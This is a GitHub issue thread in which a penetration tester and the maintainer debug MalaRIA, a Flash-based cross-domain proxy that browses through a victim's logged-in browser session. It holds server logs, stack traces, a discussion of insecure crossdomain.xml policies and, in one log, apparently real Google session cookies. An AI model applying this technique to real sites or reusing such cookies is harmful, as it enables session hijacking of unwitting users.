Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

doesn't work #3

Closed
am06 opened this Issue Nov 7, 2012 · 25 comments

Comments

Projects
None yet
2 participants

am06 commented Nov 7, 2012

I've been trying it in a pentest. would be nice a quick fix:)

this is what i get when trying to browse:

java malaria.MalariaServer localhost 8081
Starting listener on port 8081 from hostname localhost
Starting http proxy on port 8080

Starting MalariaServer
Silverlight policy server starting in port 943 for serving policy for localhost and port 8081
Flex policy server starting in port 843 for serving policy for localhost and port 8081
Flex policy server>> Client connected

Flex policy server>> Policy established
0:0:0:0:0:0:0:1
Client connected
Read 5
<- Hello
Read 179
No match
Read 179
No match
Read 179
No match

am06 commented Nov 7, 2012

i think the problem is that the server can't read from the proxy. that's why you open a server for flex on 843 and server a crossdomain.xml, right?

Owner

eoftedal commented Nov 7, 2012

There seems to be something odd going on here. Not quite sure what's going on. Seems you are using IPv6. I've never tested it with that.
The flex app successfully downloads the policy, but the seems to do something weird when connecting to start serving as a proxy.

Owner

eoftedal commented Nov 7, 2012

I would add a line below line 71 which prints the proxyMessage:
System.out.println(proxyMessage);

Which browser is using the proxy? My test setup recently was
Chrome - loads the malariproxy html and flex app
Firefox - Sets the java server as proxy and surfs through Chrome.

am06 commented Nov 7, 2012

i think i get the output Hello from that line see bellow:

Flex policy server>> Client connected

Flex policy server>> Policy established
0:0:0:0:0:0:0:1
Client connected
Read 5
<- Hello
Read 1995
GET http://www.xxxxxxxx.com/music/zzzzzzzzz.png HTTP/1.1
Host: www.xxxxxxxx.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: image/png,image/;q=0.8,/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: __utma=257663189.330820119.1352295111.1352295111.1352295111.1; ____etc_all_other cookies

-> GET http://www.xxxxxxxx.com/music/yyyyyyyyy.png image/png,image/;q=0.8,/*;q=0.5
Waiting for response from client...
DL: 0
<- Read 4096:4094/0
<- Sending 4094 to proxy client
Error in communication
java.net.SocketException: Broken pipe
at java.net.SocketOutputStream.socketWrite0(Native Method)
at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:109)
at java.net.SocketOutputStream.write(SocketOutputStream.java:141)
at malaria.MalariaServer.serveSocket(MalariaServer.java:125)
at malaria.MalariaServer.(MalariaServer.java:43)
at malaria.MalariaServer.main(MalariaServer.java:31)

This is the ouput i get from running : java malaria.MalariaServer localhost 8081

my setup is like this:

in chrome i have loaded:
http://localhost/malaria/malariaflexproxy.html ( where the victim lands, victim is also connected to the attacked website in chrome)

Above page gives output like:

MalaRIA Proxy

Connecting back to malaria server...
Connected and ready
Got data from proxy
Trying: [GET http://www.xxxxxxxxx.com/yyyyyyyyyyyy.png image/png,image/;q=0.8,/*;q=0.5 ]
Sent
Sending back data - length 0 (40851)

In Firefox i'm connected to the proxy on port 8080.

Owner

eoftedal commented Nov 7, 2012

Binary data is often a problem. Can you requesting a single file in text format like a css or js?

am06 commented Nov 7, 2012

i was requesting a websites / page. ok, i'll try for a single js.

am06 commented Nov 7, 2012

i tried to request a website's crossdomain.xml and i got this:

in console:

No match Hello

Read 576
GET http://www.zzzzzzzzzz.com/crossdomain.xml HTTP/1.1
Host: www.zzzzzzzzzz.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive

-> GET http://www.zzzzzzzzzz.com/crossdomain.xml text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Waiting for response from client...

in chrome as the victim:

MalaRIA Proxy

Connecting back to malaria server...
Connected and ready
Got data from proxy
Trying: [GET http://www.zzzzzzzzzz.com/crossdomain.xml text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 ]
Sent

So the flash proxy says it sent the response to the java app, right? and the java app is waiting for it....perhaps the java app could not read it?

am06 commented Nov 7, 2012

i also get this error from a background request of firefox:

Read 1134
GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGIuPDyCUjw8qBozHAwD_ATIFi8cDAAE HTTP/1.1
Host: safebrowsing-cache.google.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PREF=ID=6556ffa782e53196:U=15224eceb63de5d6:LD=en:TM=1341076968:LM=1352274821:GM=1:IG=4:S=MzdqK743vQ4jt0dO; SID=DQAAANEAAABQBpsqe-4LwL0Rjlo3-4-D_Icl-uYCJm6Zub-RMzPOqsHlOovQmCbXbXEfqP6O1KNhOIEPy3SuiKUmU0ywkbENKL_jSh6dWwJ5Wm0MrPh8CkX-1lE_jCSUA4c2w7L6ofqmLdqudrr_5zEelnbnG5556TJ8Aqwy0ET-8d0X4IXrqd__V6h1q1WzqEgPNI8o_HE5yoXCgT6KSTbqO7aVtGy1pQ8mG2sEEhKuILo4rvUrDTGqK0HMV41Vb-8SKZ8UjpL-1PesK0mvB00rBcTydJfHykDK4ok3a2oH4CcFr__2cQ; NID=65=vkheXWqy-GJm-xU6wE6BAzP8Pcc0adSR-DjFsQxYhrDezEO5QvobIY3Vyktq3DEP5kJrFQkkfTYd7gjqyTFRJGTD0WWR37-yhOVpsdSikWadGEtAZzrwMqmkZCssTl_5xw7My2LALZNyk7GvMcAlNtGv_mBzEao; HSID=A6d713hE1OAiKMAPc; APISID=Rm9htsA2w9YdFfdQ/AsJKEzljRP7nGpDaq
Pragma: no-cache
Cache-Control: no-cache

-> GET http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGIuPDyCUjw8qBozHAwD_ATIFi8cDAAE text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Waiting for response from client...
Error in communication
java.lang.StringIndexOutOfBoundsException: String index out of range: -1
at java.lang.String.checkBounds(String.java:405)
at java.lang.String.(String.java:450)
at malaria.MalariaServer.serveSocket(MalariaServer.java:87)
at malaria.MalariaServer.(MalariaServer.java:43)
at malaria.MalariaServer.main(MalariaServer.java:31)
0:0:0:0:0:0:0:1

Owner

eoftedal commented Nov 7, 2012

What happens if you restart the java server, wait until the flash app connects, and then make a single request to fetch a .css or .js?

am06 commented Nov 7, 2012

i think i've already tried that today at work, but without much success...i'll try again tomorrow...
also i'll check in /etc/hosts and see if i can leave localhost only as an ipv4 address like 127.0.0.1 so we can eliminate that aspect also...

Owner

eoftedal commented Nov 7, 2012

Ok, so I made a commit now with several changes to both the java backend and the flex frontend.
I suggest you recompile both and try again.

am06 commented Nov 7, 2012

thanks, will test tomorrow morning, when i'll get to work!

am06 commented Nov 8, 2012

well it seems to be proxying requests back and forth now, but..

  • i can browse to static js's , crossdomain.xml etc
  • i can browse the whole page, but not authenticated......aren't cookies added automatically?hmmm....
  • and i don't see anything logged in java console or swf hook page now....
Owner

eoftedal commented Nov 8, 2012

Are you actually using the proxy? Doesn't sound like it.

am06 commented Nov 8, 2012

yes i think there was also a problem with firefox on that regard....sometimes using the proxy, sometimes not...but i've restarted, checked firebug and it shows that it connects to 127.0.0.1:8080 where java proxy is(still nothing logged in flash page or java backend).........my website is on ssl, does your proxy now how to proxy SSL ?:)

am06 commented Nov 8, 2012

yeah, that was a burp problem in the middle....now request are logged...

am06 commented Nov 8, 2012

a few errros from the swf hook page:

Trying: [GET http://www.zzzzz.com/style/banners-personal.css text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 ]
Sent
Sending back data - length 0 (4953)
Got data from proxy
Trying: [GET http://wwww.zzzz.com/js/tables.js?v=1.7.0&222 text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 ]
Sent
FAULT:Error #2048
Sending back 502
Got data from proxy
Trying: [GET http://wwww.zzzz.com/js/tables.js?v=1.7.0 text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 ]
Sent
FAULT:Error #2048
Sending back 502

It worked first for css then it gave some errors......

am06 commented Nov 8, 2012

and these are the errors from the java backend:

-> GET http://www.zzzzz.com/css/personal.css text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Waiting for response from client...
DL: 4953
<- Read 4096:4091/4953
<- Read 862:4953/4953
<- Sending 4953 to proxy client
Incoming proxy request...
Read 1096
-> GET http://www.zzzzz.com/js//tables.js?v=1.7.0&222 text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Waiting for response from client...
Not accessible
Incoming proxy request...
Read 1092
-> GET http://www.zzzzz.com/js//tables.js?v=1.7.0 text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Waiting for response from client...
Not accessible
Incoming proxy request...

am06 commented Nov 8, 2012

i've began looking trough the source of the mxml file. When it recieves a request from the java app it should call the js log function with:
ExternalInterface.call("log", "Trying: [" + verb + " " + url + " " + accept + " " + (verb == "POST" ? " " + reqData : "") + "]");

but i do not see any output sometimes, so i don't think it forwards the request.......why could that be?

Owner

eoftedal commented Nov 8, 2012

Might be somthing weird going on the backend. Usually restarting the backend and reloading the flex page works. The protocol is way too fragile. I've been thinking about rewriting it, but I think the guys working on BEEF will port it, and make it available there.

Owner

eoftedal commented Nov 8, 2012

Btw, make sure you fully reload the the swf after changing it (sometimes the browser will cache it, and you will not see the changes)

Owner

eoftedal commented Nov 8, 2012

Regarding

 FAULT:Error #2048
 Sending back 502

This usually happens if the flex app fails to load crossdomain.xml on the server in question, or the crossdomain.xml was loaded but was restricting the application from accessing the data.

am06 commented Nov 9, 2012

hmm.......regarding #2048, do you think a site with a file like this:

cross-domain-policy
allow-access-from domain="*"/
allow-access-from domain="https://www.xxx.com"/
allow-access-from domain="http://www.yyy.com"/
/cross-domain-policy

(i have remove the 'less than', 'bigger than' symbols because of github)

Is secure or insecure? My confusion comes from the "*" which is at the start........

Also do you have any idea if java uses a file like crossdomain.xml?

Many thanks,

ps: i have started writing my own mxml file, much simpler, to test for that.....

Owner

eoftedal commented Nov 9, 2012

I think that file is insecure. Need to test it.
Regarding java it does support crossdomain.xml but as far as I know only if the .xml is completely open ("*")...

am06 commented Nov 9, 2012

you're right it is. i've tested. However i've tested over 2 sites one over http and one over https.
The one with https didn't work, do you think it's because of ssl ? insecure crossdomain.xml don't work over ssl, know anythink about that?

@am06 am06 closed this Nov 12, 2012

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment